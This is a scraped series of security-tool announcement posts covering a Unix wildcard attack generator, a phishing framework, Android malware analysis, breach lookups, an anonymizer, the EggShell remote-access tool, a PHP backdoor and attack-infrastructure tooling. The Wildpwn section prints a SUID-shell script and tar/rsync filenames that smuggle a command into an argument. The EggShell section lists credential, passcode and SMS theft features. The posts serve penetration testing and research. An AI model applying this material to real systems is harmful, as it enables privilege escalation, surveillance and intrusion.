≪ Previous: HashPump - A Tool To Exploit The Hash Length Extension Attack In Various Hashing Algorithms

Wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks, based on a paper by Leon Juranic. It’s considered a fairly old-skool attack vector, but it still works quite often.

First things first!
Read: https://www.exploit-db.com/papers/33930/

Basic usage
It goes something like this:

usage: wildpwn.py [-h] [--file FILE] payload folder

Tool to generate unix wildcard attacks

positional arguments:
  payload      Payload to use: (combined | tar | rsync)
  folder       Where to write the payloads

optional arguments:
  -h, --help   show this help message and exit
  --file FILE  Path to file for taking ownership / change permissions. Use it
               with combined attack only.

Payload types

combined: Uses the chown & chmod file reference tricks, described in section 4.1 and 4.2, combined in a single payload.
tar: Uses the Tar arbitrary command execution trick, described in section 4.3.
rsync: Uses the Rsync arbitrary command execution trick, described in section 4.4.

Usage example

$ ls -lh /tmp/very_secret_file
-rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file

$ ls -lh ./pwn_me/
drwxrwxrwx 2 root root 4,0K jun 28 21:38 .
[...]
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_1
-rw-rw-r-- 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/
[!] Selected payload: combined
[+] Done! Now wait for something like: chown uid:gid *  (or)  chmod [perms] * on ./pwn_me/. Good luck!

[...time passes / some cron gets executed...]

# chmod 000 * (for example)

[...back with the unprivileged user...]

$ ls -lha ./pwn_me/
[...]
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_1
-rwxrwxrwx 1 root root    1024 jun 28 21:38 secret_file_2
[...]

$ ls -lha /tmp/very_secret_file
-rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file

Bash scripts used on tar/rsync attacks

#!/bin/sh

# get current user uid / gid
CURR_UID="$(id -u)"
CURR_GID="$(id -g)"

# save file
cat > .cachefile.c << EOF
#include <stdio.h>
int main()
{
setuid($CURR_UID);
setgid($CURR_GID);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF

# make folder where the payload will be saved
mkdir .cache
chmod 755 .cache

# compile & give SUID
gcc -w .cachefile.c -o .cache/.cachefile
chmod 4755 .cache/.cachefile

Clean up (tar)

# clean up
rm -rf ./'--checkpoint=1'
rm -rf ./'--checkpoint-action=exec=sh .webscript'
rm -rf .webscript
rm -rf .cachefile.c

Clean up (rsync)

# clean up
rm -rf ./'-e sh .syncscript'
rm -rf .syncscript
rm -rf .cachefile.c

Download Wildpwn

↧

Phishing-Frenzy - Ruby On Rails Phishing Framework

September 16, 2018, 5:54 am

≫ Next: Droidefense - Advance Android Malware Analysis Framework

≪ Previous: Wildpwn - Unix Wildcard Attack Tool

Phishing Frenzy is an Open Source Ruby on Rails application that is leveraged by penetration testers to manage email phishing campaigns.

The project was started in 2013 by the founder Brandon "zeknox" McCann. Brandon identified inefficiencies in the way that many penetration testers were conducting email phishing engagements. Wanting to make it easier to manage phishing campaigns Brandon started the "Phishing Frenzy" project.

The goal of the project is to streamline the phishing process while still providing clients the best realistic phishing campaign possible. This goal is obtainable through campaign management, template reuse, statistical generation, and other features the Frenzy has to offer.

Documentation & Info

Relevant up to date documentation can be found on the official Phishing Frenzy website located below

Phishing Frenzy Website

Download Phishing-Frenzy

↧

Droidefense - Advance Android Malware Analysis Framework

September 16, 2018, 2:12 pm

≫ Next: pwned - A command-line tool for querying the 'Have I been pwned?' service

≪ Previous: Phishing-Frenzy - Ruby On Rails Phishing Framework

Droidefense (originally named atom: analysis through observation machine)* is the codename for android apps/malware analysis/reversing tool. It was built focused on security issues and tricks that malware researcher have on they every day work. For those situations on where the malware has anti-analysis routines, Droidefense attemps to bypass them in order to get to the code and 'bad boy' routine. Sometimes those techniques can be virtual machine detection, emulator detection, self certificate checking, pipes detection. tracer pid check, and so on.

Droidefense uses an innovative idea in where the code is not decompiled rather than viewed. This allow us to get the global view of the execution workflow of the code with a 100% accuracy on gathered information. With this situation, Droidefense generates a fancy html report with the results for an easy understanding.

Usage

TL;DR

java -jar droidefense-cli-1.0-SNAPSHOT.jar -i /path/to/your/sample.apk

Detailed usage

java -jar droidefense-cli-1.0-SNAPSHOT.jar

________               .__    .___      _____                            
\______ \_______  ____ |__| __| _/_____/ ____\____   ____   ______ ____  
 |    |  \_  __ \/  _ \|  |/ __ |/ __ \   __\/ __ \ /    \ /  ___// __ \ 
 |    `   \  | \(  <_> )  / /_/ \  ___/|  | \  ___/|   |  \\___ \\  ___/ 
/_______  /__|   \____/|__\____ |\___  >__|  \___  >___|  /____  >\___  >
        \/                     \/    \/          \/     \/     \/     \/ 


 * Current build:    2017_12_05__12_07_01
 * Check out on Github:    https://github.com/droidefense/
 * Report your issue:    https://github.com/droidefense/engine/issues
 * Lead developer:    @zerjioang

usage: droidefense
 -d,--debug                 print debugging information
 -h,--help                  print this message
 -i,--input <apk>           input .apk to be analyzed
 -o,--output <format>       select prefered output:
                            json
                            json.min
                            html
 -p,--profile               Wait for JVM profiler
 -s,--show                  show generated report after scan
 -u,--unpacker <unpacker>   select prefered unpacker:
                            zip
                            memapktool
 -v,--verbose               be verbose
 -V,--version               show current version information

Useful info

Checkout how to compile new version at:
- https://github.com/droidefense/engine/wiki/Compilation
Checkout report example at:
- https://github.com/droidefense/engine/wiki/Pornoplayer-report
Checkout execution logs at:
- https://github.com/droidefense/engine/wiki/Execution-logs

Download Droidefense

↧

pwned - A command-line tool for querying the 'Have I been pwned?' service

September 17, 2018, 5:29 am

≫ Next: CyberChef - The Cyber Swiss Army Knife [A Web App For Encryption, Encoding, Compression And Data Analysis]

≪ Previous: Droidefense - Advance Android Malware Analysis Framework

A command-line tool for querying Troy Hunt's Have I been pwned? service using the hibp Node.js module.

Installation

npm install pwned -g

Usage

Usage: pwned [option | command]


Commands:

  ba [options] <account>   get all breaches for an account (username or email address)
  breaches [options]       get all breaches in the system
  breach [options] <name>  get a single breached site by breach name
  dc [options]             get all data classes in the system
  pa [options] <email>     get all pastes for an account (email address)

Each command has its own -h (--help) option.

Options:

  -h, --help     output usage information
  -v, --version  output the version number

Examples
Get all breaches for an account:

$ pwned ba pleasebeclean@fingerscrossed.tld
Good news â no pwnage found!

Get all breaches in the system, filtering results to just the 'adobe.com' domain:

$ pwned breaches -d adobe.com
-
  Title:       Adobe
  Name:        Adobe
  Domain:      adobe.com
  BreachDate:  2013-10-04
  AddedDate:   2013-12-04T00:00:00Z
  PwnCount:    152445165
  Description: In October 2013, 153 million Adobe accounts were breached with each containing an internal ID, username, email, <em>encrypted</em> password and a password hint in plain text. The password cryptography was poorly done and <a href="http://stricture-group.com/files/adobe-top100.txt" target="_blank">many were quickly resolved back to plain text</a>. The unencrypted hints also <a href="http://www.troyhunt.com/2013/11/adobe-credentials-and-serious.html" target="_blank">disclosed much about the passwords</a> adding further to the risk that hundreds of millions of Adobe customers already faced.
  DataClasses:
    - Email addresses
    - Password hints
    - Passwords
    - Usernames
  IsVerified:  true
  IsSensitive: false
  IsActive:    true
  IsRetired:   false
  LogoType:    svg

Get a single breached site by breach name:

$ pwned breach MyCompany
No breach found by that name.

Get all the data classes in the system, returning raw JSON results for external/chained consumption:

$ pwned dc --raw
["Account balances","Age groups","Astrological signs","Avatars","Bank account numbers","Banking PINs","Beauty ratings","Biometric data","Car ownership statuses","Career levels","Chat logs","Credit cards","Customer feedback","Customer interactions","Dates of birth","Device information","Device usage tracking data","Drinking habits","Drug habits","Education levels","Email addresses","Email messages","Employers","Ethnicities","Family members' names","Family plans","Financial transactions","Fitness levels","Genders","Geographic locations","Government issued IDs","Historical passwords","Home ownership statuses","Homepage URLs","Income levels","Instant messenger identities","IP addresses","Job titles","MAC addresses","Marital statuses","Names","Nicknames","Parenting plans","Partial credit card data","Passport numbers","Password hints","Passwords","Payment histories","Personal descriptions","Personal interests","Phone numbers","Physical addresses","Physical attributes","Political views","Private messages","Purchases","Races","Recovery email addresses","Relationship statuses","Religions","Reward program balances","Salutations","Security questions and answers","Sexual fetishes","Sexual orientations","Smoking habits","SMS messages","Social connections","Spoken languages","Time zones","Travel habits","User agent details","User statuses","User website URLs","Usernames","Website activity","Work habits","Years of birth"]

Get all pastes for an email address:

$ pwned pa nobody@nowhere.com
-
  Source:     Pastebin
  Id:         xyb8vavK
  Title:      null
  Date:       2015-06-01T00:16:46Z
  EmailCount: 8
-
  Source:     Pastebin
  Id:         DaaFj8Be
  Title:      CrackingCore - Redder04
  Date:       2015-04-05T22:22:39Z
  EmailCount: 116
-
  Source:     Pastebin
  Id:         9MAAgecd
  Title:      IPTV YabancÄą Combolist
  Date:       2015-02-07T15:21:00Z
  EmailCount: 244
-
  Source:     Pastebin
  Id:         QMx1dPUT
  Title:      null
  Date:       2015-02-02T20:45:00Z
  EmailCount: 6607
-
  Source:     Pastebin
  Id:         zUFSee4n
  Title:      nethingoez
  Date:       2015-01-21T15:13:00Z
  EmailCount: 312
-
  Source:     AdHocUrl
  Id:         http://siph0n.in/exploits.php?id=4560
  Title:      BuzzMachines.com 40k+
  Date:       null
  EmailCount: 36959
-
  Source:     AdHocUrl
  Id:         http://siph0n.in/exploits.php?id=4737
  Title:      PayPalSucks Database 102k
  Date:       null
  EmailCount: 82071

Download pwned

↧

CyberChef - The Cyber Swiss Army Knife [A Web App For Encryption, Encoding, Compression And Data Analysis]

September 17, 2018, 2:07 pm

≫ Next: 4Nonimizer - A Tol For Anonymizing The Public IP Used To Browsing Internet, Managing The Connection To TOR Network And To Different VPNs Providers

≪ Previous: pwned - A command-line tool for querying the 'Have I been pwned?' service

The Cyber Swiss Army Knife

CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years. Every effort has been made to structure the code in a readable and extendable format, however it should be noted that the analyst is not a professional developer.

Live demo

CyberChef is still under active development. As a result, it shouldn't be considered a finished product. There is still testing and bug fixing to do, new features to be added and additional documentation to write. Please contribute!

Cryptographic operations in CyberChef should not be relied upon to provide security in any situation. No guarantee is offered for their correctness.

A live demo can be found here - have fun!

How it works

There are four main areas in CyberChef:

The input box in the top right, where you can paste, type or drag the data you want to operate on.
The output box in the bottom right, where the outcome of your processing will be displayed.
The operations list on the far left, where you can find all the operations that CyberChef is capable of in categorised lists, or by searching.
The recipe area in the middle, where you can drag the operations that you want to use and specify arguments and options.

You can use as many operations as you like in simple or complex ways. Some examples are as follows:

Features

Drag and drop
- Operations can be dragged in and out of the recipe list, or reorganised.
- Files can be dragged over the input box to load them directly.
Auto Bake
- Whenever you modify the input or the recipe, CyberChef will automatically “bake” for you and produce the output immediately.
- This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
- If any bake takes longer than 200 milliseconds, auto bake will be switched off automatically to prevent further performance issues.
Breakpoints
- You can set breakpoints on any operation in your recipe to pause execution before running it.
- You can also step through the recipe one operation at a time to see what the data looks like at each stage.
Save and load recipes
- If you come up with an awesome recipe that you know you’ll want to use again, just click save and add it to your local storage. It'll be waiting for you next time you visit CyberChef.
- You can also copy a URL which includes your recipe and input which can be shared with others.
Search
- If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
Highlighting
- When you highlight text in the input or output, the offset and length values will be displayed and, if possible, the corresponding data will be highlighted in the output or input respectively (example: highlight the word 'question' in the input to see where it appears in the output).
Save to file and load from file
- You can save the output to a file at any time or load a file by dragging and dropping it into the input field (note that files larger than about 500kb may cause your browser to hang or even crash due to the way that browsers handle large amounts of textual data).
CyberChef is entirely client-side
- It should be noted that none of your input or recipe configuration is ever sent to the CyberChef web server - all processing is carried out within your browser, on your own computer.
- Due to this feature, CyberChef can be compiled into a single HTML file. You can download this file and drop it into a virtual machine, share it with other people, or use it independently on your desktop.

Browser support
CyberChef is built to support

Google Chrome 40+
Mozilla Firefox 35+
Microsoft Edge 14+

Download CyberChef

↧

4Nonimizer - A Tol For Anonymizing The Public IP Used To Browsing Internet, Managing The Connection To TOR Network And To Different VPNs Providers

September 18, 2018, 6:03 am

≫ Next: Leaked? 2.0 - A Checking Tool For Hash Codes, Passwords And Emails Leaked

≪ Previous: CyberChef - The Cyber Swiss Army Knife [A Web App For Encryption, Encoding, Compression And Data Analysis]

It is a bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN), whether free or paid. By default, it includes several pre-configured VPN connections to different peers (.ovpn files) and download the credentials (if the corresponding provider support it). Also, it records each used IP that we use every 300 seconds in log files.

This script is enabled as a service in systemd systems and uses a default vpn (VPNBook) at system startup.

Since version 1.06 the dns resolution requests are done throught DnsCrypt (enable and disable with option enable_dns or disable_dns)

Since version 1.12 the logs of connections vpn saved in sqlite in /logs/

Attention VPN Providers!
If you are a provider, you support OpenVPN and want your VPN to be integrated into 4nonimizer contact the developers at hackplayers @ ymail.com.

Installation
Download the repo using git, execute the command ./4nonimizer install in the directory, and follow the screen instructions, 4nonimizer will move to the directory /opt/ and installed as a service.
This script has full compatibility with Kali Linux, although it has been properly tested and should also work on other distributions like Debian, Ubuntu and Arch (Manjaro). However there could be some bugs, or unexpected performances (please comments if you find any!).

Options
Once installed 4nonymizer, enter the command 4nonimizer help to get the help, which shows all the available parameters:

       ___                   _           _
      /   |                 (_)         (_)
     / /| |_ __   ___  _ __  _ _ __ ___  _ _______ _ __
    / /_| | '_ \ / _ \| '_ \| | '_  ` _ | |_  / _ \ '__|
    \___  | | | | (_) | | | | | | | | | | |/ /  __/ |
        |_/_| |_|\___/|_| |_|_|_| |_| |_|_/___\___|_|
                                       By Carlos Antonini & Vicente Motos
                                       Version: 1.06-beta

Usage: 4nonymizer <parameter>
     install: Install the script in run services
     uninstall: Disable run service and remove app directory
     change_provider: Change VPN Provider
     change_ip: Change IP from VPN current
     vpn_status: Check IP and provider VPN running
     update_vpns: Update all ovpn of VPNs
     start: Init the 4nonimizer service
     stop: Stop the 4nonimizer service
     stop_nonet: Stop the 4nonimizer service and shutdown network interfaces
     restart: Restart the 4nonimizer service
     update_app: Update this program via git
     privoxy: Install and configure privoxy with port 8118 (BETA)
     proxychains4: Install and configure proxychains4 for default in the system
     browser: Fire up a firefox browser with profile privoxy -> tor
     test_availability: Check peers availability and delete ovpn file if the IP/service is unreachable
     location: Now you can select a specific country or continent of the vpn peer
     enableboot: You can enable service in boot
     disableboot: You can disable service in boot
     enable_dnscrypt: Enable dnscrypt service
     disable_dnscrypt: Disable dnscrypt service
     help: Help (this screen)

Available VPNs
Currently it supports the following VPN providers:
- 7Proxies https://www.7proxies.com/
- AirVPN https://airvpn.org/
- Cryptostorm https://cryptostorm.is/
- Cyberghost https://www.cyberghostvpn.com/en_US/
- ExpressVPN https://www.expressvpn.com
- FreeVPN https://freevpn.me/
- HideMyAss https://www.hidemyass.com/
- IpPVanish https://www.ipvanish.com/
- NordVPN https://nordvpn.com
- PIA https://www.privateinternetaccess.com/
- ProntonVPN https://protonvpn.com/
- Proxy.sh https://proxy.sh/
- SlickVPN https://www.slickvpn.com
- StrongVPN https://strongvpn.com/
- TorGuard https://torguard.net/
- TunnelBear https://www.tunnelbear.com/
- VPNBook (por defecto) http://www.vpnbook.com/
- VPNGate http://www.vpngate.net/en/
- VPNKeys https://www.vpnkeys.com/
- VPNMe https://www.vpnme.me/
- Vyprvpn https://www.goldenfrog.com/es/vyprvpn

Install a new VPN
To install an additional vpn we have to use the following structure in order to the 4nonimizer be able to integrate and perform operations with it.
First, we have to create the following dir structure /vpn/ within 4nonimizer path:

In our example we create the folder /vpntest/ and within it placed all .ovpn files we have. If the files ovpn not have the certificate within each of them we put in the same folder as shown in the example certificate.crt.
In addition, we must place a file named pass.txt containing 2 lines: the first one with the username and the second one with the password, as shown below:

If we have correctly performed all steps when we execute the command 4nonimizer change_provider the menu will show our vpn:

As you can see in the picture, option [7] it is the vpn we've created.

Getting credencials and ovpn files automatically
If the VPN provider allows automation of credential and/or .ovpn files getting, 4nonimizer has standardized the following scripts names and locations:
- /opt/4nonimizer/vpn/provider/vpn-get-pass.sh

- /opt/4nonimizer/vpn/provider/vpn-get-ovpn.sh

4nonimizer automatically detect the presence of both scripts and indicate (Auto-pass Login) or (Auto-get OVPN) if it finds in the first line of each file the expression '#4uto' or '#m4nual' depending on the performed actions.

Extras
- Execute 'source 4nonimizer' to activate autocompletation of parameters.
- Copy .conkyrc in your home directory to load a 4nonimizer template and execute conky.

Videos
- Instalar 4nonimizer Kali Linux https://www.youtube.com/watch?v=FQRuRmMkcDg
- 4nonimizer Navegando de manera segura VPN (Kali Linux 2016.2) https://www.youtube.com/watch?v=6GApaN7fSn8
- devenir anonyme sur kali linux (4nonimizer) https://www.youtube.com/watch?v=Y3puD1Bw3xA
- Anonymizer - How To Hide Your IP address on Kali Linux 2016.2 (Change IP) https://www.youtube.com/watch?v=MNdQD0DCG0A
- Become Anonymous on kali linux 2016.2 https://www.youtube.com/watch?v=IFnhm-rrnEg
- Auto Hide IP with 4nonimizer on KALI Linux 2017 https://www.youtube.com/watch?v=HgqZCm8Wdvw
- Kali Linux - 4nonimizer | Surf Anonymously https://www.youtube.com/watch?v=_mOUQBv4sWs

Versions

Number	codename	date
1.00-beta	.bye-world!	5/10/2016
1.02-beta	.evol-time	11/10/2016
1.03-beta	.using-latin-i	17/10/2016
1.04-beta	.locateit	22/12/2016
1.05-beta	.encrypting	03/01/2017
1.06-beta	.1st-trial	18/01/2017
1.07-beta	.noname	03/05/2017
1.08-beta	.falcon	15/08/2017
1.09-beta	.rabbit	09/11/2017
1.10	.fresh_air	27/02/2018
1.11	.shhh	17/05/2018
1.12	.sqliting	18/05/2018

¡4nonimize the world!

Download 4Nonimizer

↧

Leaked? 2.0 - A Checking Tool For Hash Codes, Passwords And Emails Leaked

September 18, 2018, 2:03 pm

≫ Next: EggShell - iOS/macOS/Linux Remote Administration Tool

≪ Previous: 4Nonimizer - A Tol For Anonymizing The Public IP Used To Browsing Internet, Managing The Connection To TOR Network And To Different VPNs Providers

Leaked? is A Checking tool for Hash codes and Passwords and Emails leaked, uses leakz module from Aidan Holland, and leakz module uses API from Aurelius Wendelken.

Leaked? can work in any OS if they have support Python 3 and 2.

What's new?

Check email leaked
Update
More friendly for users
Support Python 2 and 3

Features

Check passwords leaked
Check hash code leaked
Check email leaked NEW!
Update NEW!
Exit
About Author

Install and Run in Linux

sudo apt update && apt install python3 python3-pip
git clone https://github.com/GitHackTools/Leaked
cd Leaked
pip3 install -r requirements.txt
pip install -r requirements.txt
python3 leaked.py

or python leaked.py

Install and Run in Windows
Download and run Python 3 setup file from Python.org. In Install Python 3 , enable Add Python 3.7 to PATH and For all users
Download and run Git setup file from Git-scm.com, choose Use Git from Windows Command Propmt.
After that, Run Command Propmt or PowerShell and enter this commands:

git clone https://github.com/GitHackTools/Leaked
cd Leaked
pip install -r requirements.txt
python leaked.py

Update Leaked?: git pull -f

Notes
Leaked? uses leakz module from Aidan Holland, and leakz module uses API from Aurelius Wendelken
Let follow their Twitter account!

Screenshots

Contact to Author

Twitter: @SecureGF
Facebook: @GitHackTools
Google Plus: +TVT618

Download Leaked

↧

EggShell - iOS/macOS/Linux Remote Administration Tool

September 19, 2018, 5:25 am

≫ Next: Door404 - PHP Backdoor For Web Servers

≪ Previous: Leaked? 2.0 - A Checking Tool For Hash Codes, Passwords And Emails Leaked

EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. This is project is a proof of concept, intended for use on machines you own.

For detailed information and how-to visit http://lucasjackson.io/eggshell

Follow on twitter: @neoneggplant

New In Version 3.0.0

More secure socket connection using SSL
Linux support
Tab completion
Improved over all structure and efficiency of session handling
Native iOS python support for 64 bit devices

Getting Started

Requires python 2.7

macOS/Linux Installation

git clone https://github.com/neoneggplant/eggshell
cd eggshell
python eggshell.py

iOS (Jailbroken)
Add Cydia source: http://lucasjackson.io/repo Install EggShell 3 Use any mobile terminal application and run the command eggshell

Creating Payloads
Eggshell payloads are executed on the target machine. The payload first sends over instructions for getting and sending back device details to our server and then chooses the appropriate executable to establish a secure remote control session.

bash
Selecting bash from the payload menu will give us a 1 liner that establishes an eggshell session upon execution on the target machine

teensy macOS (USB injection)
Teensy is a USB development board that can be programmed with the Arduino ide. It emulates usb keyboard strokes extremely fast and can inject the EggShell payload just in a few seconds.

Selecting teensy will give us an arduino based payload for the teensy board.

After uploading to the teensy, we can use the device to plug into a macOS usb port. Once connected to a computer, it will automatically emulate the keystrokes needed to execute a payload.

Interacting with a session

After a session is established, we can execute commands on that device through the EggShell command line interface. We can show all the available commands by typing "help"

Tab Completion
Similar to most command line interfaces, EggShell supports tab completion. When you start typing the path to a directory or filename, we can complete the rest of the path using the tab key.

Multihandler
The Multihandler option lets us handle multiple sessions. We can choose to interact with different devices while listening for new connections in the background.

Similar to the session interface, we can type "help" to show Multihandler commands

Commands

macOS

brightness : adjust screen brightness
cd : change directory
download : download file
getfacebook : retrieve facebook session cookies
getpaste : get pasteboard contents
getvol : get speaker output volume
idletime : get the amount of time since the keyboard/cursor were touched
imessage : send message through the messages app
itunes : iTunes Controller
keyboard : your keyboard -> is target's keyboard
lazagne : firefox password retrieval | (https://github.com/AlessandroZ/LaZagne/wiki)
ls : list contents of a directory
mic : record mic
persistence : attempts to re establish connection after close
picture : take picture through iSight
pid : get process id
prompt : prompt user to type password
screenshot : take screenshot
setvol : set output volume
sleep : put device into sleep mode
su : su login
suspend : suspend current session (goes back to login screen)
upload : upload file

iOS

alert : make alert show up on device
battery : get battery level
bundleids : list bundle identifiers
cd : change directory
dhome : simulate a double home button press
dial : dial a phone number
download : download file
getcontacts : download addressbook
getnotes : download notes
getpasscode : retreive the device passcode
getsms : download SMS
getvol : get volume level
home : simulate a home button press
installpro : install substrate commands
ipod : control music player
islocked : check if the device is locked
lastapp : get last opened application
locate : get device location coordinates
locationservice: toggle location services
lock : simulate a lock button press
ls : list contents of a directory
mic : record mic
mute : update and view mute status
open : open apps
openurl : open url on device
persistence : attempts to re establish connection after close
picture : take picture through iSight
pid : get process id
respring : restart springboard
safemode : put device into safe mode
say : text to speach
setvol : set device volume
sysinfo : view system information
upload : upload file
vibrate : vibrate device

Linux

cd : change directory
download : download file
ls : list contents of a directory
pid : get process id
pwd : show current directory
upload : upload file

Download EggShell

↧

Door404 - PHP Backdoor For Web Servers

September 19, 2018, 1:47 pm

≫ Next: hideNsneak - A CLI For Ephemeral Penetration Testing

≪ Previous: EggShell - iOS/macOS/Linux Remote Administration Tool

Door404 is Open Source PHP Backdoor For Web Servers Developed By MrSqar& Rizer
This Project Developed For 2 Reasons

First

" Help Beginners to learn coding . "

econd

" Help Newbie Servers Managers To Learn New Protection Tricks"

Requirements

PHP
PHP CUrl

Linux

ScreenShots

Video :

Download Door404

↧

hideNsneak - A CLI For Ephemeral Penetration Testing

September 20, 2018, 5:37 am

≫ Next: Singularity - A DNS Rebinding Attack Framework

≪ Previous: Door404 - PHP Backdoor For Web Servers

This application assists in managing attack infrastructure for penetration testers by providing an interface to rapidly deploy, manage, and take down various cloud services. These include VMs, domain fronting, Cobalt Strike servers, API gateways, and firewalls.

Black Hat Arsenal Video Demo Video - https://youtu.be/8YTYScLn7pA

Overview
hideNsneak provides a simple interface that allows penetration testers to build ephemeral infrastructure -- one that requires minimal overhead. hideNsneak can:

deploy, destroy, and list
1. Cloud instances via EC2 and Digital Ocean (Google Cloud, Azure, and Alibaba Cloud coming soon)
2. API Gateway (AWS)
3. Domain fronts via AWS Cloudfront and Google Cloud Functions (Azure CDN coming soon)
Proxy through infrastructure
Deploy C2 redirectors
Send and receive files
Port scanning via NMAP
Remote installations of Burp Collab, Cobalt Strike, Socat, LetsEncrypt, GoPhish, and SQLMAP
work with teams teams

Running locally
A few disclosures for V 1.0:

At this time, all hosts are assumed Ubuntu 16.04 Linux.
Setup is done on your local system (Linux and Mac Only). In the future, we're hoping to add on a docker container to decrease initial setup time
The only vps providers currently setup are AWS and Digital Ocean
You need to make sure that go is installed. Instructions can be found here
the GOPATH environment variable MUST be set

Create a new AWS S3 bucket in us-east-1
- Ensure this is not public as it will hold your terraform state
go get github.com/rmikehodges/hideNsneak
cd $GOPATH/src/github.com/rmikehodges/hideNsneak
./setup.sh
cp config/example-config.json config/config.json
- fill in the values
- aws_access_id, aws_secret_key, aws_bucket_name, public_key, private_key, ec2_user, and do_user are required at minimum
- all operators working on the same state must have config values filled in all the same fields
- private and public keys must be the same for each operator
now you can use the program by running ./hidensneak [command]

Commands

hidensneak help --> run this anytime to get available commands
hidensneak instance deploy
hidensneak instance destroy
hidensneak instance list
hidensneak api deploy
hidensneak api destroy
hidensneak api list
hidensneak domainfront enable
hidensneak domainfront disable
hidensneak domainfront deploy
hidensneak domainfront destroy
hidensneak domainfront list
hidensneak firewall add
hidensneak firewall list
hidensneak firewall delete
hidensneak exec command -c
hidensneak exec nmap
hidensneak exec socat-redirect
hidensneak exec cobaltstrike-run
hidensneak exec collaborator-run
hidensneak socks deploy
hidensneak socks list
hidensneak socks destroy
hidensneak socks proxychains
hidensneak socks socksd
hidensneak install burp
hidensneak install cobaltstrike
hidensneak install socat
hidensneak install letsencrypt
hidensneak install gophish
hidensneak install nmap
hidensneak install sqlmap
hidensneak file push
hidensneak file pull

For all commands, you can run --help after any of them to get guidance on what flags to use.

Organization

_terraform --> terraform modules
_ansible --> ansible roles and playbooks
_assets --> random assets for the beauty of this project
_cmd --> frontend interface package
_deployer --> backend commands and structs
main.go --> where the magic happens

IAM Permissions
Google Domain Fronting

App Engine API Enabled
Cloud Functions API Enabled
Project editor or higher permissions

Miscellaneous
A default security group hideNsneak is made in all AWS regions that is full-open. All instances are configured with iptables to only allow port 22/tcp upon provisioning.
If your program starts throwing terraform errors indicating a resource is not found, then you may need to remove the problematic terraform resources. You can do this by running the following:
cd $GOPATH/src/github.com/rmikehodges/hideNsneak/terraform
terraform state rm <name of problem resource>
This resource will need to be cleaned up manually if it still exists.

Troubleshooting
Error: configuration for module name here is not present; a provider configuration block is required for all operations
This is usually due to artifacts being left in the state from old deployments. Below are instructions on how to remove those artifacts from your state. If they are live resources, they will need to be manually destroyed via the cloud provider's administration panel.

cd $GOPATH/src/github.com/rmikehodges/hideNsneak/terraform
terraform state rm <module or resource name>

Error: Error locking state: Error acquiring the state lock: ConditionalCheckFailedException: The conditional request failed status code: 400, request id: P7BUM7NA56LQEJQC20A3SE2SOVVV4KQNSO5AEMVJF66Q9ASUAAJG Lock Info: ID: 4919d588-6b29-4aa7-d917-2bcb67c14ab4
If this does not go away after another user has finished deploying then it is usually due to to Terraform not automatically unlocking your state in the face of errors. This can be fixed by running the following:

terraform force-unlock <ID> $GOPATH/src/github.com/rmikehodges/hideNsneak/terraform

Note that this will unlock the state so it may have an adverse affect on any other writes happening in the state so make sure your other users are not actively deploying/destroying anything when you run this.

Download hideNsneak

↧